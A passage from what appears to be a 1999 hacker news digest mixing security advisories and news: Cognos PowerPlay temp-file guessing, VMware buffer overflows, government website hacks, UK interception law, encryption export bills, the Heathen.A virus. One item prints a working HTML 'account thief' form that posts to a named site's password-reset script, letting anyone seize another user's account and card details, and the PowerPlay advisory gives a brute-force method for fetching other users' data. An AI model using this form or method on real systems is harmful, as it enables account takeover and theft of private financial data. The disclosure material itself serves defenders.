the content area and select View Frame Info which will display
the temporary filename. By repeatedly reloading the initial cube
view and viewing frame info a list of temporary filenames may be
generated in order to analyze the filename algorithm. e.g.
http://www.example.com/ppwb/Temp/1eeex.htm
http://www.example.com/ppwb/Temp/1f77x.htm
http://www.example.com/ppwb/Temp/1fcfx.htm
http://www.example.com/ppwb/Temp/1ff6x.htm
http://www.example.com/ppwb/Temp/2014x.htm
Analysis of the filename progression shows:
* the last char is 'x' for the data and 't' for the toolbar
* first n-1 chars are hexadecimal chars only
* the hexadecimal "numbers" comprising the filename are ascending only
* the first char is never 0. e.g. fffx.htm => 1000x.htm
* simple hexadecimal subtraction on the first n-1 chars of consecutive
filenames shows a very predictable pattern (see appendix A)
A user may orient themselves in the namespace (the set of all possible
filenames) by using a guest account or unprotected cube. Once oriented
a set of candidate filenames may be generated and requested from
/ppwb/Temp on the server. Of course this approach assumes valid
users are hitting the cubes at the same time. Once a successful
hit has been made on a temporary file the user may drill further
into the data as described in (a) above.
Alternatively a brute force attack on a server could be attempted
by just submitting requests for all possible filenames. Of course if
you could establish some idea of how long the site has been operational
you might start with 4-char filenames. A very new site with low traffic
(if the owner displays a page counter) might be best approached with
3-char names. This type of attack would present a beat-the-clock
situation as the ~65000 requests (for 4-char) scanned for an existing
file before it was purged from the Temp directory.
(c) ad hoc parameters to the CGI
A variety of parameters to http://www.example.com/cgi-bin/ppdscgi.exe
provide additional information on the PowerPlay server.
* ?ABOUT= will return the version of PowerPlay.
* ?TOC (or no parameter) presents a table of contents list of all
web-enabled cubes on the server. Some sites are using static page
links to hit cubes rather than relying on PowerPlay's generated TOC.
They may not be aware that all cubes are available.
* the hidden parm PPWB in the data contents frame details the unaliased
location of the temporary directory. e.g.
INPUT TYPE="HIDDEN" NAME="PPWB" VALUE="C:/Netscape/SuiteSpot/docs/ppwb">
III. Solution
(a) dynamic directory listing
Turn this feature off on you web server following the directions
provided by the server vendor. If you are unable to disable this
feature you may create an index.html file in the /ppwb/Temp directory
that will load when a filename has not been specified in the URL.
(b) weak temporary filename algorithm
This is really on Cognos' plate. Watch your error logfile for
a lot of failed requests for /ppwb/Temp/*.htm to at least detect
an attack. Removing anonymous cube access may slow an attack.
(c) ad hoc parameters to the CGI
Just be aware of what is available by altering the parameters.
Don't assume your cubes are hidden because there is no direct
link to the table of contents from the web. Password protect
your cubes.
DW
APPENDIX A
Here's the output of one subtraction run which shows the v6.5
temporary filenames and then the hex delta between adjacent filenames:
Processing test.dat ...
2161x.htm
216bx.htm Ax
2188x.htm 1Dx
2192x.htm Ax
219cx.htm Ax
21a6x.htm Ax
21afx.htm 9x
21b9x.htm Ax
21c3x.htm Ax
21cdx.htm Ax
21d7x.htm Ax
21e0x.htm 9x
21eax.htm Ax
21f4x.htm Ax
21fex.htm Ax
2207x.htm 9x
2211x.htm Ax
221bx.htm Ax
2225x.htm Ax
222fx.htm Ax
2238x.htm 9x
2242x.htm Ax
224cx.htm Ax
2256x.htm Ax
2260x.htm Ax
2269x.htm 9x
2273x.htm Ax
227dx.htm Ax
2287x.htm Ax
2291x.htm Ax
229ax.htm 9x
SUMMARY
diff count
A : 23
1D : 1
9 : 6
out of 31 filenames
Here are some other summaries:
SUMMARY
diff count
203B : 1
DF : 1
13 : 4
A : 10
14 : 3
27 : 1
9 : 1
out of 22 filenames
SUMMARY
diff count
3E : 1
A : 19
9 : 5
out of 26 filenames
Analysis of filenames created under v6.0 of PowerPlay Web Ed. showed:
25bx.htm
25cx.htm 1x
25dx.htm 1x
25ex.htm 1x
25fx.htm 1x
260x.htm 1x
261x.htm 1x
262x.htm 1x
263x.htm 1x
264x.htm 1x
265x.htm 1x
266x.htm 1x
267x.htm 1x
268x.htm 1x
269x.htm 1x
26ax.htm 1x
26bx.htm 1x
26cx.htm 1x
SUMMARY
diff count
1 : 17
out of 18 filenames
SUMMARY
diff count
37E : 1
1 : 491
out of 493 filenames
SUMMARY
diff count
1E7 : 1
1 : 295
out of 297 filenames
SUMMARY
diff count
1 : 1255
out of 1256 filenames
APPENDIX B
1999-06-10 analysis submitted to Cognos
1999-06-11 submission acknowledged
1999-06-18 response from Cognos (below)
-----------------------------
Hello Darin,
Thank you for the descriptive analysis of your problem. I understand that
you have set up anonymous access and therefore you are aware of the security
risk. I agree that the temp file generation is predictable and would suggest
logging an enhancement through our web site.
In the interim you have to weigh what is acceptable in terms of security
knowing that there are other alternatives such as SSL and LDAP. These other
options will of course offer substantially more protection.
In conclusion your analysis is correct, now it is a factor of weighing your
security wants and needs.
Regards,
Michael Bockholt
Cognos Support Specialist
Tel: 1-800-637-7447
email: support@cognos.com
-----------------------------
--------------------------------------------------------------------
Darin White
d.w@ibm.net
--------------------------------------------------------------------
@HWA
06.0 VMware Security Alert
~~~~~~~~~~~~~~~~~~~~~
Snarfed from PacketStorm Security: http://packetstorm.harvard.edu/
Date: Fri, 25 Jun 1999 19:18:35 -0700
From: Jason R. Rhoads <jason.rhoads@SABERNET.NET>
To: BUGTRAQ@netspace.org
Subject: VMware Security Alert
"On June 22nd, 1999, VMware, Inc. was notified of a security problem with
VMware for Linux 1.0.1. This security hole is also present in all previous
versions of VMware for Linux. The security hole has been fixed in VMware for
Linux 1.0.2 released today. The security hole allows a buffer overrun attack
against VMware for Linux to result in unprivileged root access to a machine
An updated version of VMware for Linux which fixes this problem is available
now, see below. As far as we know, this breach has never been used for malicious
purposes, or caused any harm to customer installations. VMware, Inc. apologizes
for the inconvenience to our users."
http://www.vmware.com/news/security.html
-----------------------------------------------------------------------------
<http://www.vmware.com/news/security.html>
VMware Security Alert
Date: June 25th, 1999
On June 22nd, 1999, VMware, Inc. was notified of a security problem with VMware for Linux 1.0.1. This security hole is
also present in all previous versions of VMware for Linux. The security hole has been fixed in VMware for Linux 1.0.2
released today. The security hole allows a buffer overrun attack against VMware for Linux to result in unprivileged root
access to a machine. An updated version of VMware for Linux which fixes this problem is available now, see below. As
far as we know, this breach has never been used for malicious purposes, or caused any harm to customer installations.
VMware, Inc. apologizes for the inconvenience to our users.
Vulnerable Systems
The security hole allows an attack to occur during VMware startup, but before a virtual machine is powered on. Guest
operating systems themselves are unlikely to be affected by these buffer overflow attacks. Systems most vulnerable to
this attack are multi-user Linux systems that have VMware installed. A malicious user with access to an account on the
system could exploit the hole. Stand alone single-user machines are not at high risk from this security hole. This hole
does not allow direct network based 'worm' style attacks against VMware.
This security hole was discovered by Asylum Security, a division of CyberSpace 2000,
<http://www.cyberspace2000.com/security/> a professional computer security
response team. VMware has taken immediate action in response to this event. VMware for Linux 1.0.2 was made
available for download on June 25th, 1999 on our web site and mirror sites. The shipment of CD-ROMs has been
suspended and the inventory discarded. Customers who have purchased VMware for have been notified by electronic mail,
VMware has also posted security alerts to newsgroups at news.vmware.com.
Affected VMware Releases
This security hole is present in VMware for Linux 1.0.1 and all previous versions, including the beta versions
(build-106, build-135, build-152) and the experimental version (build-179). VMware recommends that users replace
beta and experimental versions with VMware for Linux 1.0.2. An updated VMware for Linux experimental release with
fixes for this security hole will be made available in the near future.
How to Close this Security Hole
The security hole can be closed by simply upgrading to VMware for Linux version 1.0.2:
1.Download VMware for Linux 1.0.2 from one of our mirror sites
<http://www.vmware.com/download/downloadlinux.html>
2.Untar the distribution.
tar zxvf vmware-1.0.2.tar.gz
3.Change directory to vmware-install
cd vmware-install
4.As root, install VMware for Linux
su
./install.pl
You will first be asked whether you want to upgrade VMware for Linux. Simply answer yes at this point and
then follow any installer instructions.
NOTE: It is not possible to resolve this security problem by removing suid (Set User ID) root privileges from
the VMware executable. VMware must be suid root to run correctly.
Reporting Security Issues
VMware is committed to addressing security issues and providing customers with information on how they can protect
themselves. If you identify what you believe may be a security issue with a VMware product, please send an email to
security@vmware.com. We will work to appropriately address and communicate the issue.
Notification of Security Alerts
When VMware becomes aware of a security issue that significantly affects our products, we will take action to notify
affected customers. Typically this notification will be in the form of a security bulletin explaining the issue, and where
possible a response to the problem. These bulletins will both be emailed to affected customers and posted on our web site
and newsgroups at news.vmware.com. <http://www.vmware.com/support/newsgroups.html>
-----------------------------------------------------------------------------
Date: Sat, 26 Jun 1999 17:33:22 -0400
From: Don <don@CYBERSPACE2000.COM>
To: BUGTRAQ@netspace.org
Subject: VMWare Advisory - buffer overflows
This advisory was made on 06/21/99 and was to be released on 06/28/99 (or
after a fix was released). We would like to recognize the VMware staff and
their responsiveness to the bug reports. Last night, customers who
purchased their product received notices to upgrade to VMware v1.0.2.
For more information on the VMware bugs, visit:
http://www.vmware.com/news/security.html
http://www.cyberspace2000.com/security/advisories
-Don Sausa
----------[asylum security]------------
id: #99021, team director
e-mail: don@cyberspace2000.com
web: http://cyberspace2000.com/security
---------------------------------------
Team Asylum Security
Copyright (c) 1999 By CyberSpace 2000
http://www.cyberspace2000.com/security
Source: Seth L. [seth@cyberspace2000.com]
Advisory Date: 06/21/99
Release Date: 06/28/99
[ Final Revision: 06/25/99 ]
Affected
--------
VMware v1.0.1 and earlier for Linux.
Product Description
-------------------
VMware v1.0.1 is a software product by VMware, Inc. that creates a
virtual machine in which you can install multiple operating systems
without repartitioning or formatting your hard drive.
Vulnerability Summary
---------------------
Team Asylum has found multiple buffer overflows existing in VMware v1.0.1
for Linux. Earlier versions also have the same buffer overflows.
VMware Inc. has been notified of these overflows and they have released
VMware v1.0.2 as a fix. Any local user can exploit these overflows to gain
root access.
Fix
---
All users are encouraged to upgrade to VMware v1.0.2. You may download
it directly off http://www.vmware.com.
Special Thanks
--------------
Special thanks to VMware staff for responding quickly to our bug reports.
Within 3 days, they have managed to fix the overflows, as well as stop the
physical distribution of their v1.0.1 product. All customers who have
purchased VMware have been notified as of 06/25/99 12:00 midnight (PST)
about the new VMware v1.0.2 version.
@HWA
07.0 Security vulnerability in hustler.com login template
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Snarfed from PacketStorm Security: http://packetstorm.harvard.edu/
security vulnerability in hustler.com which allows any user to
steal another users account and gain access to full access to
their account including cc# information
no fix yet. hustler.com has been informed.
----------------------------------------------------------------------------
exploit template
----------------------------------------------------------------------------
<!-- E G 0 D 3 A T H -->
<HTML>
<HEAD><TITLE>HUSTLER LOGIN THEIF BY EGODEATH</TITLE></HEAD>
<BODY bgcolor=#000000 text=#FFFFFF>
<table border="0">
<th><font colo<b><u>HACKED</b></u>
</table>
<H2>Change My Password - ego's M0D1Fi3D verzi0n</H2>
<FORM METHOD="POST" ACTION="https://members.flyntdigital.com/secure-bin/usr_search_admin/resetpass.pl">
<TABLE BORDER=1 CELLSPACING=0 CELLPADDING=4 WIDTH=500>
<TR>
<TH VALIGN=TOP WIDTH=40% ALIGN=RIGHT>Highlight the User ID: </TH>
<TD>
<font color=red>This is the hustler account thief script<br>in order for this to work you must know<br>somones real login name ( if its an old carded<br> account with a nick like XTC, give up<br> you cant steal a froozen account, but<br> yea.. u can change its password...</font>
<input type="text" NAME="usr_login" value="a real login name">
</TD>
</TR>
<TR>
<TD align=left>Enter Your New Password</TD>
<TD align=right>Enter Password again</TD>
</TR>
<TR>
<TD ALIGN=left>
<INPUT TYPE="text" NAME="pass_wd1" VALUE="">
</TD>
<TD align=right>
<INPUT TYPE="text" NAME="pass_wd2" VALUE="">
</TD>
</TR>
<TR>
<TD COLSPAN=2 ALIGN=CENTER>
<INPUT TYPE="submit" NAME="submit" VALUE="Submit">
<INPUT TYPE="reset" NAME="reset" VALUE="Reset">
</TD>
</TR>
</TABLE>
</FORM>
</BODY>
</HTML>
@HWA
08.0 DOD investigating computer 'Mob-like' tactics
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From: Federal Computer Week;http://www.fcw.com/pubs/fcw/fcwhome.htm
JUNE 30, 1999 . . . 12:25 EDT
DOD investigating computer 'mob tactics'
BY DANIEL VERTON (dan_verton@fcw.com)
While a senior adviser to the Defense Department testified before Congress
this week on threats to national security stemming from the export of powerful
computer technology, his supervisor allegedly attempted to access and tamper
with his computer, prompting the immediate launch of a full-scale investigation.
Rep. Dan Burton (R-Ind.), chairman of the House Government Reform
Committee, said Jay Davis, director of the Defense Threat Reduction Agency,
informed the committee on June 28 that an investigation was under way into an
incident involving unauthorized access to the computer belonging to a senior
strategic trade adviser to the agency.
According to Burton, the incident took place while Peter Leitner, a longtime
internal critic of DOD's policy on exporting sensitive computer technologies,
was testifying on June 24 before the committee regarding security problems
stemming from that policy. Although no details from the investigation have been
released yet, Burton claims that the incident is an example of DOD officials
trying to strong-arm a congressional witness into not cooperating with the
committee.
"While Dr. Leitner was telling my committee about the retaliation he suffered
for bringing his concerns to his superiors and Congress, his supervisor was
trying to secretly access his computer," Burton said. "This smacks of mob
tactics. Congress will not stand for this kind of witness intimidation."
Although DTRA has launched an investigation into the incident, Burton said he
plans to call upon Defense Secretary William Cohen to ask for "his personal
involvement" in the case. "I intend to ask a lot of questions of the Defense
Department officials involved, and I expect to get straight answers," Burton
said.
Leitner has criticized the department's policy of easing export controls on
powerful computer technology that is used to simulate and test the reliability of
nuclear weapons, claiming that the acquisition of supercomputer technology
abroad was feeding a new form of Cold War characterized by an arms race for
"virtual weapons."
@HWA
09.0 GSA announces Intrusion Detection Net
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From: Federal Computer Week;http://www.fcw.com/pubs/fcw/fcwhome.htm
JUNE 28, 1999
GSA launches intrusion-detection net
BY DIANE FRANK (diane_frank@fcw.com)
The General Services Administration last week
asked industry for information about emerging security
technology for detecting unauthorized users on agency
networks, with the goal of building a government
intrusion-detection system by the end of next year.
In building the Federal Intrusion Detection Network
(Fidnet), GSA hopes to find security tools vendors are
developing that overcome the weaknesses of existing
technology. By keeping ahead of the latest technology,
GSA hopes to leave agency defenses less vulnerable
to hackers, agency officials said.
"We want to encourage people to develop new
technologies that will help us keep neck and neck with
the perpetrator," said David Jarrell, program manager
for the GSA portion of Fidnet in the Federal
Technology Service's Office of Information Security
and technical director of the Federal Computer
Incident Response Capability.
OIS will look not only to established intrusion-detection vendors but to new
companies and people that "we haven't even heard of," Jarrell said.
"I think there are people out there that are significantly brilliant enough to solve
this and we hope that this [request for information] will cause them to come
forward," he said.
GSA plans to use the vendor-provided information to develop prototypes by the
first quarter of fiscal 2000, said Tom Burke, GSA's assistant commissioner of
information security. Down the line, OIS may even pay some of the vendors to
put together a long-term, real-world demonstration of their capabilities at an
agency, he said.
GSA particularly is interested in finding intrusion-detection systems that are
more capable of detecting attacks as they happen instead of after the fact.
The problem is that most intrusion-detection solutions work the same way
anti-virus protection does: They check network-use patterns against a known list
of intrusion "signatures" and send out alerts when they come across a match.
But as vendors and users have known for years, this method will not catch
intrusions that are not on that list. Also, most products just now are advancing to
the point where they alert administrators at the time an intrusion takes place.
"We find that many of the off-the-shelf products that are available today are
really a response to the intrusions, and they are always a step behind the
intruder," Jarrell said. "We want to look to the future and some artificial
intelligence that will learn as it goes about the attacks that are being launched."
This type of capability would be more than welcome to agencies, especially if
they are enabled to respond more quickly at the local level, said one senior
civilian agency official.
Others recognized the potential benefits of sharing attack "experience" across
government.
"What I would hope this next-generation intrusion detection could bring to us is
the capability not only to monitor [intrusions] but to put together the information
in a history for reference," said Sarah Jane League, Defense Department liaison
at the Critical Infrastructure Assurance Office. "It should bring that pattern
recognition and learn as it goes...so that over time it will have the ability to
recognize" not only attacks but what could be attacks, she said.
Vendors have been working on this type of product, sometimes called anomaly
detection, for some time.
"ISS has a lot of research efforts in place to advance the intrusion-detection
market," said Mark Wood, intrusion-detection product manager at Internet
Security Systems Inc., maker of the Real-Secure intrusion-detection product
line. "Having a pre-defined list of signatures is nice, but you'd like to detect
novel attacks, things you don't know about."
One major problem vendors are struggling with in producing this type of solution
is the large number of "false positives" -- incorrectly perceived attacks -- that
are generated when a network is scanned, Wood said. Despite this, a
commercially viable solution could be available within the next year, he said.
"It's certainly worthwhile that someone like the GSA is driving this; it's
absolutely necessary," Wood said. "Perhaps this will help coordinate the industry
so that they will provide something sooner than they would have."
The need for this type of solution across government has been underscored by
the more than 40 federal World Wide Web sites that have been hacked in the
last two months, including at least six last week. And these attacks are only the
most noticeable types of intrusions into government networks, according to
federal experts testifying before Congress last week [see related story, "House
member suggests regular network security reports"].
However, in the end, while many would wish otherwise, keeping up with
attackers instead of one step behind really is the best that anyone can do, Jarrell
said. "There is no silver bullet; there is no perfect solution when it comes to
intrusion detection," he said. "As I've said before, if you build a better
mousetrap, a better mouse will evolve."
@HWA
10.0 Nasa servers reportedly hacked
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From http://www.newsbytes.com/pubNews/132718.html
30 Jun 1999, 10:51 AM CST
By David McGuire, Newsbytes.
MINNEAPOLIS, MINNESOTA, U.S.A.,
. In what appears to be the third computer attack on
a government Website this week, crackers may
have gained unauthorized access to one or more
National Aeronautics and Space Administration (NASA)
servers yesterday.
"There is some indication that a couple servers at the
Marshal Space Flight Center in Huntsville, Alabama" were
attacked earlier this week, a NASA spokesperson told
Newsbytes today. NASA could not confirm the reports as of
this writing.
The Marshall site was up and running as of 11:00 EDT
today.
While Sunday's hack of the US Army's home page typifies
the kind of high-profile attack favored by many hacker (more
accurately known as cracker) groups, the apparent Marshal
attack and yesterday's crack of National Oceanic and
Atmospheric Administration's (NOAA) Norman, Okla.-based
Storm Prediction Center are more puzzling, Newsbytes
notes.
Marshall is a fairly low-profile NASA center that focuses
primarily on research in the areas of astronomy, low gravity,
and space shuttle propulsion. The Storm Prediction Center
(SPC) provides nationwide weather forecasts.
The SPC hack caught NOAA by surprise. "At about three
AM, some Internet customer called one of our forecasters
and said 'You better check your Website,'" SPC Director Joe
Schaefer told Newsbytes yesterday.
"We produce weather forecasts for the whole country," he
said. "We are doing a public good. There is no way I can
see that we are harming anybody. To come after a site like
this is strange, to put it mildly."
The Army hack was somewhat more typical. At some point
Sunday night, crackers replaced the Army's home page with
a page that read "Hello, this Website hack has a purpose.
The purpose is to settle rumors. Global Hell is alive, Global
Hell will not die," Lt. Col. Ron Burns of the Army's Director
for Information Systems Command, Control,
Communications and Computers (DISC4) unit told
Newsbytes Monday.
Sunday's attack was the first successful crack of the Army's
main site, located at http://www4.army.mil .
The US Senate and Federal Bureau of Investigation (FBI)
have also suffered recent Website attacks.
The FBI declined comment on the string of hacker attacks.
Reported by Newsbytes.com, http://www.newsbytes.com .
10:51 CST
Reposted 10:59 CST
@HWA
11.0 UK May Force ISPs to Install Taps
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
June 28th
From HNN http://www.hackernews.com/
contributed by Weld Pond
The British Interception of Communications Act has
been the target of proposed changes recently. The
changes would require all communications service
providers to build in, at their expense, capabilities for
government agents to be able to listen in to
communications. This proposal is particularly broad as it
does not stop at the internet and covers everything
from pagers to video conferencing to VPNs. Theses new
requirements have been proposed by the International
Law Enforcement Telecommunications Seminar
(ILETS)an exclusive FBI funded group that meets in
secret.
Tech Web
http://www.techweb.com/news/story/TWB19990625S0019
U.K. Wants ISPs To Build In
Interception
(06/25/99, 3:40 p.m. ET)
By Duncan Campbell, TechWeb
The British government has become the first in
Europe to openly propose internationally
agreed requirements for ISPs to build
technology into networks that would allow for
police surveillance.
Under proposals for changes to the Interception of
Communications Act announced by the Home Office this
week, all communications service providers (CSPs)
would be required to build interception software or
hardware into their systems.
The law -- if passed -- will apply to all types of new
communications services, including Internet telephony,
TV conferencing, paging, and satellite based personal
communications systems.
The International User Requirements have been drawn
up over the past six years by a group founded by the
U.S. FBI, called the International Law Enforcement
Telecommunications Seminar (ILETS), which meets in
secret. The group excludes representatives from industry
or civil rights organizations, and has attempted to
standardize its objectives as an International
Telecommunication Union requirement.
According to this week's "white paper," every type of
network will be covered, including VPNsoperated
through the Internet or other TCP/IP systems. The new
law will also cover interception of business telecom
services, ranging from basic networks of a few lines
found within a small office to large networks linking
offices, in both the public and private sectors, the
document says.
Under the present British Interception of
Communications Act, only licensed public telecom
operators have to provide government tapping facilities
within their networks. However, ISPs must surrender
any stored communications data they have, including
e-mail, Web-access records, and service details, if
served with an order.
Home Secretary Jack Straw now proposes all CSPs be
required to take reasonable steps to ensure their system
is capable of being intercepted.
"This will be an ongoing requirement CSPs will have to
consider each time they develop their network or
introduce new services," Straw said. "CSPs will also be
required to provide reasonable assistance to effect
warranted intercepts."
This will include real-time access to data about their
subscribers and information about services they have
used, including logs of telephone calls, e-mail, or website
accesses. A key part of technical arrangements to be
made will ensure operators will not be able to know what
information has been copied from their systems.
The British government said the new law would make
full provision for human-rights legislation, Straw said.
But according to Madeleine Colvin of Justice, the
international human-rights organization and British
section of the International Commission of Jurists, the
proposed law would not achieve this.
"There are major gaps in what these proposals suggest
for controlling surveillance methods. For example, how is
anyone to know if their human rights may have been
abused if they are never going to be told that their e-mail
has been intercepted by the government?" he asked.
@HWA
12.0 Crypto Tie Downs Loosened
~~~~~~~~~~~~~~~~~~~~~~~~~
June 28th
From HNN http://www.hackernews.com/
contributed by mortel
Bills to loosen the restrictions on exporting strong
encryption were approved on Thursday by the U.S.
Senate and House Commerce Committees. The House
Security and Freedom through Encryption (SAFE) Act
removes the government restrictions on export of strong
encryption if a comparable encryption product is
commercially available outside the U.S. In addition, the
SAFE Act bars the government from requiring key
recovery. Yeah!
CNN
http://www.cnn.com/TECH/computing/9906/25/cryptbill.idg/
U.S. committees approve
encryption bill
by Elinor Mills Abreu
From...
(IDG) -- The U.S. Senate and House
Commerce Committees Thursday
approved bills that would liberalize
encryption export regulations. In
addition, the Senate committee
passed bills calling for the promotion
of digital signatures and filtering
software to block pornography.
The House Security and Freedom
through Encryption (SAFE) Act
removes the government restrictions
on export of strong encryption if a
comparable encryption product is
commercially available outside the
U.S. In addition, the SAFE Act bars
the government from requiring key
recovery, whereby the government
would have access to keys to decode
encrypted messages for
law-enforcement purposes.
The government argues that it needs
to control the export of strong
encryption for national security.
Vendors argue that the restrictions
hamper their competitiveness on the worldwide market because strong
encryption is readily available outside the U.S. The government wants vendors
to develop encryption software that includes a key recovery mechanism.
The amendments approved by the House committee would do several things:
require that a comparable encryption product be available in a country outside
the U.S. in order for a U.S. company to export similar technology there; bar
export to the People's Liberation Army or the Communist Military in China;
allow the Secretary of Commerce to deny the export of encryption products if
they would be used to harm national security, to sexually exploit children or to
execute other illegal activities; require the Secretary of Commerce to consult
with the secretaries of State and Defense, the Director of Central Intelligence
and the Attorney General when reviewing a product; and subject a person to
criminal penalties for not providing access to encrypted data if a subpoena
were served and the person had the capability to decrypt the data.
Meanwhile, Sen. John McCain [R-Ariz.]
proposed a Senate encryption bill that would
allow for the exportation of encryption of key
lengths up to 64 bits. In general, companies
currently must get a license to export
encryption higher than 56 bits in key length.
In addition, the McCain encryption bill would
allow for the export of stronger "nondefense"
encryption to "responsible entities" and
governments in the North Atlantic Treaty
Organization, the Association of Southeast
Asian Nations and the Organization for
Economic Cooperation and Development.
However, the Secretary of Commerce would
be allowed to prohibit export of particular
encryption products to an individual or
organization in a foreign country. An
Encryption Export Advisory Board would be
created to review applications for exemption
of encryption of over 64 bits, make
recommendations to the Secretary of
Commerce and authorize more funding to law
enforcement and national security agencies to
"upgrade facilities and intelligence." The bill
would ask the National Institute of Standards
and Technology to establish an advanced
encryption standard by Jan. 1, 2002.
"The bill carefully balances our national security and law enforcement
interests while updating current laws on encryption technology," McCain said
in a statement. "It is illogical to deny U.S. producers the ability to compete
globally if similar products are already being offered by foreign companies."
On the digital signature front, Sen. Spencer Abraham [R-Mich.] said the
Millennium Digital Commerce Act he sponsored would "ensure that individuals
and organizations in different states are held to their agreements and
obligations even if their respective states have different rules concerning
electronically signed documents."
The Abraham bill would pre-empt state law from denying that digital contracts
are legal solely because they are in electronic form; establish guidelines for
international use of electronic signatures that would remove obstacles to
electronic transactions; and allow the market to determine the type of
authentication technology used in international commerce.
The Senate Commerce Committee also grappled with Internet censorship by
approving another McCain-sponsored bill. The plan would require schools and
libraries receiving government universal service discounts for Internet access
to use filtering technology on computers children access that would screen out
pornography.
Taking up a less controversial bill, the Senate committee also approved a
measure to tie cellular phone users calling 911 to medical centers, police and
firefighters for faster response time to accidents and emergencies. The bill
would expand the coverage areas of wireless telephone service; establish
parity of protection for the provision or use of wireless 911 service; and
upgrade 911 systems so they can provide information such as location and
automatic crash notification data.
Alan Davidson, staff counsel for the Washington, D.C.-based Center for
Democracy and Technology, said "it was a mixed day for the Internet on
Capital Hill."
While legislators realize the potential of electronic commerce and favor
liberalizing encryption export to advance it, they are fearful of what they see
as the "dark side" of the Internet - content that might be objectionable,
according to Davidson.
Rather than require filtering software in schools and libraries, legislators should
offer educational institutions the flexibility to choose "acceptable use or
monitoring policies," he said.
"Mandating that every school and library filter access to the Internet is not
going to be the best way to protect kids," he said. "In addition to the fact that
the bill has constitutional problems, it mandates one technological approach
without regard to the more effective ways that local communities are already
protecting kids."
Other committees may review these bills before they go to the floor of the two
houses for a vote, he said.
@HWA
13.0 Heathen.A Spreads Through Word Files
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
June 28th
From HNN http://www.hackernews.com/
contributed by nvirb
While not intentionally malicious or as fast spread as
Melissa or WormExplorer Heathen.A is latest threat to
computer users. Heathen.A is considered to be a
multipartite virus and only infects only Word97 files.
PC World
http://www.pcworld.com/pcwtoday/article/0,1510,11586,00.html
Heathen.A Is at the Gates
Keep a lookout: There's a new bug in town.
by Matthew Nelson, InfoWorld Electric
June 25, 1999, 4:50 p.m. PT
SAN MATEO, CALIFORNIA -- Network Associates'
Anti-Virus Emergency Response Team is warning
users about what it terms a "medium risk" virus called
Heathen.A.
Heathen.A is a multipartite virus, as it uses two
classes of files, an .exe portion and a .doc portion, for
its infection. The virus was originally spread from a
newsgroup and replicates itself across Microsoft Word
97 files, but it does not destroy data.
"It's delivered if someone receives an e-mail with an
infected Word 97 document, or if they access any
server file that is infected," says Allison Taylor, product
marketing manager for corporate antivirus solutions at
Network Associates. "It doesn't carry a particular
payload except for dropping a patch into your
[Windows] 95/98 shell."
"It runs a modified version of your Windows Explorer
system and then infects the Word 97 documents,"
Taylor explains. "So once you've been infected, any
Word 97 file that you open from then on will also be
infected."
The macro drops three system files, heathen.vex,
heathen.vdl, and heathen.vdo, into a system's
C:/Windows subdirectory. When the system is
rebooted, the heathen.vex file is renamed explorer.exe,
according to AVERT Labs.
NAI has assigned the Heathen.A virus a medium-risk
level as it is not engineered to appear to be coming
from a known user, and because it infects new
systems only if a user opens an infected Word 97 file.
Heathen.A does not send itself through e-mail as
Melissa and Worm.ExploreZip do.
NAI has issued a virus update to protect against the
Heathen.A virus at AVERT Labs' Web site.
@HWA
14.0 $950 for a Log File Analysis Tool
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
June 28th
From HNN http://www.hackernews.com/
contributed by Weld Pond
Sandstorm Enterprises has introduced what they are
calling a TCP/IP Session Reassembler named TCP.demux.
According to the press release it doesn't seem to be
more than a glorified grep script. Maybe it is actually
useful but $950 seems a little steep.
Excite News
http://news.excite.com/news/bw/990623/ma-sandstorm
Sandstorm Enterprises
http://www.sandstorm.net
Sandstorm Enterprises Introduces TCP.demux, a TCP/IP Session Reassembler; New,
Efficient Tool for Network-Based Investigations, Auditing, and Reverse Engineering
Click on our sponsors!
Updated 1:34 PM ET June 23, 1999
BOSTON (BUSINESS WIRE) - Sandstorm Enterprises Inc., an information security tools company, has released the first version
of TCP.demux, a TCP/IP session reconstruction utility. TCP.demux is the first of a set of tools from Sandstorm Enterprises for
advanced network monitoring and surveillance.
TCP.demux is designed to make network monitors, such as "tcpdump", "snoop", and "Sniffer Basic" more useful. There are so
many connections over even a medium-sized network that it is often impossible for even a high-end commercial network analyzer
to present the traffic in a clear, informative way. TCP.demux takes IP streams captured by network monitors, reassembles them
into their constituent TCP/IP and UDP sessions, and displays the information in a variety of convenient formats. TCP.demux
includes sophisticated and powerful analysis tools for quick identification of relevant sessions.
Possible uses of TCP.demux include network security, reverse engineering, and network-based software development. It can be
used to create profiles of suspicious users and to find information being sent unencrypted over a network. It can also help point out
weaknesses and vulnerabilities in network applications and design. TCP.demux detects and flags anomalies that may be designed
to interfere with network monitoring.
TCP.demux generates reports in 19 different text or HTML formats. It runs on a wide variety of platforms, including Windows
95/98/2000/NT and many varieties of UNIX, including RedHat Linux 5.1, NetBSD, OpenBSD, FreeBSD, BSDI, and Solaris.
TCP.demux can easily be included in batch files, shell scripts, and other applications in any computer language.
The idea of a TCP session reconstruction tool is not new, but all other such tools have been platform-specific and embedded in
ponderous application suites. "There have been many tools for winnowing through Internet traffic flows, but almost everything to
date has been scaled or developed for the workgroup environment," says James VanBokkelen, Sandstorm's President and founder.
"The Internet has grown enormously in the past few years, and with it the scale of the problems. TCP.demux is the first tool we
know of designed with the scope of today's problems in mind."
Analyzing network traffic with TCP.demux is time-efficient, and therefore cost-efficient. Because dumpfile analysis is separated
from the capture process, TCP.demux allows remote monitoring of networks. An engineer at one of Sandstorm's beta sites said,
after TCP.demux had allowed him to isolate problems on a large congested network in under half an hour, "TCP.demux was the
quickest way to debug the system. Had the debugging process been long, it would have jeopardized our ability to ship on time."
TCP.demux is being offered at the introductory price of $950. Additional information on TCP.demux can be found at
http://www.sandstorm.net/tcpdemux.
Sandstorm Enterprises, headquartered in Boston, MA, has been acclaimed for its groundbreaking PhoneSweep telephone scanner,
the first commercial product designed to audit corporate telephone networks for vulnerability to attacks by hackers. See Sandstorm
Enterprises at the USENIX Security Conference in Washington, D.C. August 25-26. Sandstorm personnel collectively have
decades of experience in security management, software development, research, education, and consulting. Sandstorm is
committed to providing trusted, reliable products and excellent technical support. Sandstorm Enterprises is on the web at
http://www.sandstorm.net.
PhoneSweep and TCP.demux are trademarks of Sandstorm Enterprises, Inc.
